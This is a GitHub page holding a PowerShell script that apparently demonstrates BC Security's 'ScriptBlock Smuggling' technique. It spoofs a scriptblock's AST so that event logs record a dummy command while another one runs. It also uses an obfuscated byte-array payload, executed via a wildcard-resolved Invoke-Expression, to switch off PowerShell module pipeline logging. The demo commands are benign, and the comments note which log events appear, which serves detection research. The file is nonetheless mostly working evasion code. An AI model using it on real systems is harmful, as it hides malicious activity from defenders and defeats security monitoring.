-
Notifications
You must be signed in to change notification settings - Fork 2
Expand file tree
/
Copy pathBypassLogging_001.ps1
More file actions
24 lines (22 loc) · 2.89 KB
/
BypassLogging_001.ps1
File metadata and controls
24 lines (22 loc) · 2.89 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
# https://github.com/BC-SECURITY/ScriptBlock-Smuggling
Function Invoke-LoggingBypass(){
param([String]$Command, [String]$Dummy)
$SpoofedAST = [scriptblock]:: Create($Dummy).Ast
$ExecutedAST = [scriptblock]::Create($Command).Ast
$AST = [System.Management.Automation.Language.ScriptBlockAst]::new($SpoofedAST.Extent, $null, $null, $null, $ExecutedAST.EndBlock.Copy(), $null)
$ScriptBlock = $AST.GetScriptBlock()
& $ScriptBlock
}
# https://bc-security.org/powershell-logging-obfuscation-and-some-newish-bypasses-part-1/
# byte array "$module = Get-Module Microsoft.PowerShell.Utility;$module.LogPipelineExecutionDetails = $false;$module=Get-Module Microsoft.PowerShell.Management;$module.LogPipelineExecutionDetails = $false;(Get-PSSnapin).LogPipelineExecutionDetails = $false"
# Could simplify further with (Get-Module <name>).LogPipelineExecutionDetails = $false
try{
if(((Get-PSSnapin).LogPipelineExecutionDetails)-or((Get-Module Microsoft.PowerShell.Utility).LogPipelineExecutionDetails)-or(Get-Module Microsoft.PowerShell.Management).LogPipelineExecutionDetails){
[byte[]]$z=(0x24,0x6d,0x6f,0x64,0x75,0x6c,0x65,0x20,0x3d,0x20,0x47,0x65,0x74,0x2d,0x4d,0x6f,0x64,0x75,0x6c,0x65,0x20,0x4d,0x69,0x63,0x72,0x6f,0x73,0x6f,0x66,0x74,0x2e,0x50,0x6f,0x77,0x65,0x72,0x53,0x68,0x65,0x6c,0x6c,0x2e,0x55,0x74,0x69,0x6c,0x69,0x74,0x79,0x3b,0x24,0x6d,0x6f,0x64,0x75,0x6c,0x65,0x2e,0x4c,0x6f,0x67,0x50,0x69,0x70,0x65,0x6c,0x69,0x6e,0x65,0x45,0x78,0x65,0x63,0x75,0x74,0x69,0x6f,0x6e,0x44,0x65,0x74,0x61,0x69,0x6c,0x73,0x20,0x3d,0x20,0x24,0x66,0x61,0x6c,0x73,0x65,0x3b,0x24,0x6d,0x6f,0x64,0x75,0x6c,0x65,0x3d,0x47,0x65,0x74,0x2d,0x4d,0x6f,0x64,0x75,0x6c,0x65,0x20,0x4d,0x69,0x63,0x72,0x6f,0x73,0x6f,0x66,0x74,0x2e,0x50,0x6f,0x77,0x65,0x72,0x53,0x68,0x65,0x6c,0x6c,0x2e,0x4d,0x61,0x6e,0x61,0x67,0x65,0x6d,0x65,0x6e,0x74,0x3b,0x24,0x6d,0x6f,0x64,0x75,0x6c,0x65,0x2e,0x4c,0x6f,0x67,0x50,0x69,0x70,0x65,0x6c,0x69,0x6e,0x65,0x45,0x78,0x65,0x63,0x75,0x74,0x69,0x6f,0x6e,0x44,0x65,0x74,0x61,0x69,0x6c,0x73,0x20,0x3d,0x20,0x24,0x66,0x61,0x6c,0x73,0x65,0x3b,0x28,0x47,0x65,0x74,0x2d,0x50,0x53,0x53,0x6e,0x61,0x70,0x69,0x6e,0x29,0x2e,0x4c,0x6f,0x67,0x50,0x69,0x70,0x65,0x6c,0x69,0x6e,0x65,0x45,0x78,0x65,0x63,0x75,0x74,0x69,0x6f,0x6e,0x44,0x65,0x74,0x61,0x69,0x6c,0x73,0x20,0x3d,0x20,0x24,0x66,0x61,0x6c,0x73,0x65)
& ([String]::new(((gcm *v?k?-?x?re*).name)))([String]::new($z))
}
}catch{}
# The following command displays "Write-Host 'test' in the 4104 log and does not generate a 4103 log"
Invoke-LoggingBypass -Command "Write-Host 'Hello World'" -Dummy "Write-Host 'test'"
# The following command displays "write-Host 'Detect Me!' in the 4104 log and generates a blank 4103 Out-Default log. In cases where the file already exists, a 4103 event will be generated with the error text."
Invoke-LoggingBypass -Command "New-Item -Name Detect.txt -ItemType File -Path '$env:USERPROFILE\Desktop' | write-host" -Dummy "Write-Host 'Detect Me!'"